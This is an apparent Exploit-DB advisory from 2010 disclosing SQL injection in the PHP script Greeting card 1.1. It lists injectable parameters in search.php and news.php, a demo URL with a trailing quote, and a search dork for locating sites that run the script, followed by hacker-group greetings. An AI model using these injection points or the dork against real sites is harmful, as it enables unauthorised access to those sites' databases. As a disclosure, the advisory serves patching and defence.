Greeting card 1.1 - SQL Injection

EDB-ID:

13983

CVE:

N/A




Platform:

PHP

Date:

2010-06-22


========================================
Grering card SQL Injection Vulnerability
========================================


# Title : Greetring card SQL Injection Vulnerability
# Author : Net.Edit0r
# Location : Iran
# Dork : "Send amazing greetings to your friends and relative!"
# Category : webapps
# Version : 1.1
# Platform : linux/php


[~]######################################### InformatioN
#############################################[~]

[~] Title : Grering card SQL Injection Vulnerability
[~] Author : Net.Edit0r
[~] Email : Net.Edit0r@Att.net ~ Black.Hat.TM@Gmail.com

[~]######################################### ExploiT
#############################################[~]

[~] 1. Vulnerable File :

http://127.0.0.1/search.php?CategoryID=15&SubcategoryID=[SQL]

[~] 2. Vulnerable File :

http://127.0.0.1/search.php?CategoryID=6[SQL]

[~] 3. Vulnerable File :

http://127.0.0.1/news.php?CategoryID=[SQL]

[~] 3. Demo :

http://server/search.php?CategoryID=15&SubcategoryID=60'

[~]######################################### ThankS To ...
############################################[~]

[~] Special Thanks To My Best FriendS :

NetQard , B3hz4d , Raiden , ~[ CriMe ]~ , † CoNstaNtine † , _R3v4l_ ,
~~XTerror~~ , __l2o5v4__ , _Attack_

[~] IRANIAN Young HackerZ

[~] GreetZ : Sun-Army.Org , Phc.Ir , Dark-tunnel.com , AttackerZ.IR

[~]######################################### FinisH :D
#############################################[~]